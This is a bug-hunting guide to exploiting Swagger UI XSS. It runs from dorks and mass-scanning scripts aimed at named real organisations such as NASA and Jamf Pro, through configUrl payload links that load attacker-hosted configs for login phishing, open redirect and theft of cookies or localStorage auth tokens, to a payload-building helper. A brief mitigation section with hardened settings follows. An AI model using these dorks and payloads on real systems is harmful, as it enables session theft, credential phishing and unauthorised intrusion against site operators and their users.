Swagger XSS Vulnerabilities
Exploiting Cross-Site Scripting in Swagger UI and OpenAPI documentation interfaces. Complete guide with dorks, automation, and bypass techniques.
Phase 1
Google Dorks - Find Exposed APIs
Google only returns pages it has already indexed; use Phases 4-9 for hosts it has not crawled.
#1 Enumerate non-www subdomains of swagger.io (a demo target). This dork finds subdomains, not Swagger UI itself, so combine it with #2
site:*.swagger.io -www
#2 Find Swagger UI on a specific target domain
intext:"Swagger UI" intitle:"Swagger UI" site:Target.com
#3 Search for Swagger endpoints on NASA's domain
site:nasa.gov inurl:(swagger-ui OR swagger.json OR swagger.yaml)
#4 Locate the default Swagger UI path
inurl:"/swagger-ui/index.html"
#5 Advanced: multiple common paths on NASA, filtering out code-hosting and Q&A sites
intitle:"Swagger UI" (inurl:"/swagger-ui/" OR inurl:"/swagger/" OR inurl:"/api-docs/" OR inurl:"/v2/api-docs" OR inurl:"/v3/api-docs" OR inurl:"swagger.json" OR inurl:"swagger.yaml") -github -gitlab -stackoverflow site:nasa.gov
#6 Find exposed API spec files in common API folders on NASA
site:nasa.gov (inurl:api OR inurl:apis OR inurl:graphql OR inurl:swagger OR inurl:v1 OR inurl:v2 OR inurl:v3) (filetype:json OR filetype:yaml OR filetype:xml)
Phase 2
Automating Google Dork Results
Save the result URLs from the dorks above, one per line, to swagger.txt.
Extract unique hosts from swagger.txt (after splitting on "/", field 3 of a URL is the host, with port if present)
awk -F/ '{print $3}' swagger.txt | sort -u
Pipe the discovered hosts to Nuclei with a Swagger detection template (swagger.yaml is a local template file; the public nuclei-templates repository also ships a Swagger API detection template)
awk -F/ '{print $3}' swagger.txt | sort -u | nuclei -t swagger.yaml
Use a Python script for automated dorking (dorking.py is not reproduced on this page; reference: https://sites.google.com/site/linkgopher)
python dorking.py
Phase 3
GitHub Dorks - Find Vulnerable Versions
#1 Find package.json files pinning swagger-ui-dist 3.1-3.3 (GitHub code search regex syntax; the optional [\^~] also catches caret/tilde ranges)
/"swagger-ui-dist": "[\^~]?3\.[1-3]\./ path:package.json
#2 Search a repository for hardcoded URLs/endpoints (e.g., repo:strapi/strapi)
repo:ORG/REPO ("https://" OR "http://" OR ".com")
Phase 4
Censys - Find Public Swagger UIs
#1 Find Swagger keywords in HTTP response bodies (host data set)
host.services.endpoints.http.body:{"swagger", "swagger-ui"}
#2 The same search against the web data set
web.endpoints.http.body:{"swagger", "swagger-ui"}
#3 Restrict to NASA infrastructure. The OR branch must be parenthesized; without the parentheses the nasa term only applies to the first branch and the query returns every Swagger UI in the web data set
nasa AND (host.services.endpoints.http.body:{"swagger", "swagger-ui"} OR web.endpoints.http.body:{"swagger", "swagger-ui"})
#4 Same query restricted to records that carry an IP (host.ip:* only requires the field to exist, so it barely narrows the result set)
(nasa AND (host.services.endpoints.http.body:{"swagger", "swagger-ui"} OR web.endpoints.http.body:{"swagger", "swagger-ui"})) AND host.ip:*
Phase 5
Fofa - Find Swagger Interfaces
Find Swagger UIs on redacted.com by favicon hash (the four hashes are favicons shipped with Swagger UI builds)
"redacted.com" && (icon_hash="-1180440057" || icon_hash="-1128940573" || icon_hash="-1839822816" || icon_hash="1120729672")
Phase 6
Shodan - Exposed Swagger Interfaces
#1 Detect services with Swagger identified as a web component
http.component:"Swagger"
#2 Search for pages titled Swagger UI
http.title:"Swagger UI"
#3 Find pages containing swagger-ui in the HTML body
http.html:"swagger-ui"
#4 Combined filter for higher-confidence Swagger UI detection
http.component:"Swagger" http.title:"Swagger UI" http.html:"swagger-ui"
#5 Swagger UI pages returning 200 OK (the status filter is http.status; a bare "+200" is not a Shodan filter)
http.title:"Swagger UI" http.status:200
#6 Swagger UIs on a specific domain (e.g., getsling.com)
http.title:"Swagger UI" hostname:"getsling.com"
Phase 7
Mass Hunting - Shodan Facet Analysis
The two snippets below are pasted into the browser DevTools console on a Shodan search results page. They read the <strong> elements Shodan uses for result IPs/hostnames and download them as a text file.
#1 Extract the IPs from the current results page and download ip.txt
(function () {
  // Shodan renders each result's IP inside a <strong>; keep only IPv4-looking values, deduplicated
  var ips = Array.from(new Set(Array.from(document.querySelectorAll('strong'))
    .map(function (e) { return e.textContent.replace(/["']/g, '').trim(); })
    .filter(function (t) { return /^(\d{1,3}\.){3}\d{1,3}$/.test(t); })));
  var a = document.createElement('a');
  a.href = 'data:text/plain;charset=utf-8,' + encodeURIComponent(ips.join('\n'));
  a.download = 'ip.txt';
  document.body.appendChild(a);
  a.click();
})();
#2 Extract the hostnames from the current results page and download domains.txt (IPs are already covered by #1; the file holds one hostname per line so it can be fed straight to Nuclei)
(function () {
  // Keep only domain-looking values: not starting with digits-and-dot, with a TLD of 2+ letters
  var domains = Array.from(new Set(Array.from(document.querySelectorAll('strong'))
    .map(function (e) { return e.textContent.replace(/["']/g, '').trim(); })
    .filter(function (t) { return /^(?!\d+\.)[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/.test(t); })));
  var a = document.createElement('a');
  a.href = 'data:text/plain;charset=utf-8,' + encodeURIComponent(domains.join('\n'));
  a.download = 'domains.txt';
  document.body.appendChild(a);
  a.click();
})();
#3 Scan the extracted IPs with the Nuclei Swagger template
sort -u ip.txt | nuclei -t swagger.yaml
#4 Scan the extracted domains with the Nuclei Swagger template
sort -u domains.txt | nuclei -t swagger.yaml
Phase 8
Automation with Subfinder and Httpx
httpx-toolkit is the Kali package name for ProjectDiscovery's httpx; where the tool is installed under its own name, use httpx.
#1 Find Swagger UI on all subdomains of a target
subfinder -d target.com -all -silent | httpx-toolkit -silent -title | grep -i "Swagger UI"
#2 Detect Swagger, OpenAPI, Redoc, or RapiDoc titles on a list of hosts
httpx-toolkit -l swagger.txt -silent -title | grep -Ei "swagger|openapi|redoc|rapidoc"
#3 Probe common documentation paths on a single domain, showing title and status code
echo "example.com" | httpx -path /docs,/swagger,/api-docs,/swagger-ui,/swagger-ui.html -silent -title -sc
Phase 9
Path Brute-Forcing with Custom Wordlists
Fuzz Swagger paths across all alive hosts. Two wordlists run in ffuf's default clusterbomb mode: alive_ones.txt holds full URLs with scheme, and the path list entries start with "/"
ffuf -w /root/wordlist/api/swagger_xss.txt:FUZZ -w alive_ones.txt:URL -u URLFUZZ -mc 200 -o ffuf-result.txt
Dirsearch with multiple extensions for Swagger files
dirsearch -u https://api.getsling.com -w payloads/swagger.txt -e html,json,yaml,js -t 20 --random-agent --force-recursive --full-url
Reference: Swagger wordlist by CoffinXP
https://github.com/coffinxp/swagger/blob/main/swagger-wordlist.txt
Phase 10
DOM XSS via Swagger UI - Jamf Pro
The Jamf Pro Classic API documentation (/classicapi/doc/) embeds Swagger UI. Each request below passes a data: URI as configUrl; the base64 body is a JSON Swagger UI config whose url key points the UI at an attacker-hosted spec, so the config itself needs no hosting. This only works where the instance still honors query-string configuration (queryConfigEnabled).
Jamf Pro: load a custom Swagger login-form template for phishing
https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy5zaGlyb3VwL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMvc3dhZ2dlciJ9
Jamf Pro: test open-redirect behavior via a redirecting login config
https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHViVXNlcmNvbnRlbnQuY29tL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMvcmVkdXJpLnB4N3UifQ==
Jamf Pro: trigger a basic XSS payload to check for DOM-based vulnerabilities
https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHViVXNlcmNvbnRlbnQuY29tL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMveHNzdGVzdC5qc29uIn0=
If vulnerable, the injected script runs in the page origin and can read the auth token from localStorage
alert(localStorage.getItem('authToken'))
Phase 11
DOM XSS & HTML Injection & Open Redirect
Generic form of the same technique for any Swagger UI that accepts configUrl: the config JSON is hosted remotely (CoffinXP's repository) instead of being inlined as a data: URI. Replace site.com with the Swagger UI base path of the target.
#1 Loads a custom Swagger login-form template for login phishing
https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json
#2 Tests open-redirect behavior via a redirecting login config
https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json
#3 Triggers a basic XSS payload to check for DOM-based vulnerabilities
https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json
#4 Executes a script to exfiltrate cookies or auth tokens from localStorage
https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.json
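How the configUrl payloads of Phases 10 and 11 are assembled, as an added example (not code from this page, from CoffinXP's repository, or from Swagger UI): one helper inlines a Swagger UI config object into a data: URI so the target loads an arbitrary spec, and a second one decodes such links for auditing. The target and attacker hosts are placeholders.

```javascript
// Added example: build and decode Swagger UI "configUrl" payloads.
// When Swagger UI honors query-string configuration it fetches the JSON at
// ?configUrl=..., merges it into its options, and uses the config's "url"
// key as the OpenAPI document to render. Hosts are constructed placeholders.

// Build ".../?configUrl=data:<mediaType>;base64,<config>" with <config> = {"url": specUrl}.
// mediaType defaults to application/json; the Phase 10 payloads on this page use text/html.
function buildInlineConfigUrl(swaggerUiBase, specUrl, mediaType = 'application/json') {
  const config = JSON.stringify({ url: specUrl });
  const b64 = Buffer.from(config, 'utf8').toString('base64');
  const target = new URL(swaggerUiBase);
  // searchParams percent-encodes the data: URI; the query parser decodes it again
  target.searchParams.set('configUrl', `data:${mediaType};base64,${b64}`);
  return target.toString();
}

// Inspect a link. Returns null when there is no configUrl parameter,
// {kind: 'inline', config} for a data: URI (base64 or plain), and
// {kind: 'remote', location} for an http(s) config such as Phase 11 uses.
function decodeConfigUrlParam(link) {
  const param = new URL(link).searchParams.get('configUrl');
  if (param === null) return null;
  if (/^data:/i.test(param)) {
    const comma = param.indexOf(',');
    if (comma === -1) return { kind: 'inline', config: null, error: 'malformed data URI' };
    const header = param.slice(5, comma); // e.g. "text/html;base64"
    const body = param.slice(comma + 1);
    const raw = /;base64$/i.test(header)
      ? Buffer.from(body, 'base64').toString('utf8')
      : decodeURIComponent(body);
    try {
      return { kind: 'inline', config: JSON.parse(raw) };
    } catch (e) {
      return { kind: 'inline', config: null, error: 'body is not JSON' };
    }
  }
  return { kind: 'remote', location: param };
}

module.exports = { buildInlineConfigUrl, decodeConfigUrlParam };
```

The links on this page leave the data: URI unencoded in the query string, which browsers accept; the builder emits the percent-encoded form, and both decode to the same parameter value. Running decodeConfigUrlParam over the Phase 10 links shows that each carries a one-key config object whose url points at the attacker-hosted spec.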
Phase 12
Mitigation - How Developers Can Prevent
Do not expose Swagger UI on production or customer-facing systems
# Disable Swagger UI in production environments
Protect Swagger routes with Basic Auth, token-based auth, or IP allowlisting
# Require authentication for accessing Swagger UI
Disable query-string configuration (queryConfigEnabled: false, the default in current releases) or, if remote spec loading is genuinely needed, use a strict allowlist of hosts
# Validate and sanitize query parameters like ?url= and ?configUrl=
Stay on the latest stable Swagger UI release to pick up XSS fixes
# Use the latest stable version of Swagger UI
Sanitize any dynamic data (parameter names, descriptions, info fields) rendered inside Swagger UI, and serve the docs route with a Content-Security-Policy
# Apply consistent input validation and escaping
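What the queryConfigEnabled setting changes, and an allowlist check for the spec URL, as an added example (not Swagger UI's own code; the option resolution is a simplified model of Swagger UI's behaviour written for illustration, and the hostnames are placeholders). The weak configuration is shown next to the hardened one.

```javascript
// Added example: weak vs hardened Swagger UI options, a simplified model of
// how query-string overrides are applied, and an allowlist for spec URLs.
// Not Swagger UI's code; hosts are constructed placeholders.

// Options Swagger UI reads from the query string when query config is enabled
const QUERY_OVERRIDABLE = ['url', 'configUrl'];

// Weak: ?url= / ?configUrl= replace the spec, which is what Phases 10-11 abuse
const WEAK_CONFIG = { dom_id: '#swagger-ui', url: '/openapi.json', queryConfigEnabled: true };

// Hardened: pinned spec, query-string overrides ignored
function hardenedConfig(specPath = '/openapi.json') {
  return { dom_id: '#swagger-ui', url: specPath, queryConfigEnabled: false };
}

// Simplified model of option resolution: query parameters are copied into
// the config only when queryConfigEnabled is true.
function resolveEffectiveConfig(baseConfig, queryString) {
  const effective = { ...baseConfig };
  if (!baseConfig.queryConfigEnabled) return effective;
  const params = new URLSearchParams(queryString);
  for (const key of QUERY_OVERRIDABLE) {
    if (params.has(key)) effective[key] = params.get(key);
  }
  return effective;
}

// Allowlist for deployments that must load specs from other origins.
// Accepts same-origin paths ("/openapi.json"); rejects protocol-relative
// URLs, non-http(s) schemes (data:, javascript:), embedded credentials
// (https://api.example.com@evil.example) and hosts that merely end with an
// allowed name (api.example.com.evil.example). Hostname match is exact.
function isAllowedSpecUrl(candidate, allowedHosts) {
  if (/^\/(?![\/\\])/.test(candidate)) return true; // same-origin path
  let u;
  try { u = new URL(candidate); } catch (e) { return false; } // relative or garbage
  if (u.protocol !== 'https:' && u.protocol !== 'http:') return false;
  if (u.username !== '' || u.password !== '') return false;
  const host = u.hostname.toLowerCase();
  return allowedHosts.some(h => h.toLowerCase() === host);
}

// Server-side pattern: the application, not Swagger UI, reads ?url=, applies
// the allowlist, and emits a config with query overrides disabled.
function configForRequest(queryString, allowedHosts, fallback = '/openapi.json') {
  const requested = new URLSearchParams(queryString).get('url');
  const spec = requested !== null && isAllowedSpecUrl(requested, allowedHosts) ? requested : fallback;
  return hardenedConfig(spec);
}

module.exports = { WEAK_CONFIG, hardenedConfig, resolveEffectiveConfig, isAllowedSpecUrl, configForRequest };
```

The allowlist is host-only; a Content-Security-Policy with a tight connect-src on the docs route adds a second layer, because Swagger UI fetches specs and configs with the browser's fetch API and the browser enforces that directive regardless of what the config says.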
Reference
Version-Specific Vulnerabilities
Swagger UI 2.x
Vulnerabilities
- configUrl parameter injection
- Reflected XSS via query parameters
- OpenAPI spec injection in info fields
- Unsanitized parameter names/descriptions
Swagger UI 3.x (modern)
Vulnerabilities
- URL parameter injection (url, configUrl)
- DOM XSS via client-side rendering
- OpenAPI spec injection
- Template injection in some implementations
Swagger UI 4.x+ (latest)
Vulnerabilities
- Smaller attack surface (CSP support, query-string config off by default), but:
- Some XSS via custom plugins
- Misconfigured OAuth/OIDC flows
- Reflected XSS if the CSP is bypassed or absent
Tools
Tools & Resources
Link Gopher Browser Extension
Bulk open Swagger UIs and manually test each interface for vulnerabilities
CoffinXP Swagger Repository
Complete Swagger XSS testing repository with payloads and configs
Swagger Wordlist
Custom wordlist for fuzzing Swagger endpoints
Video: Complete Practical Guide
YouTube video showing complete practical implementation of Swagger XSS method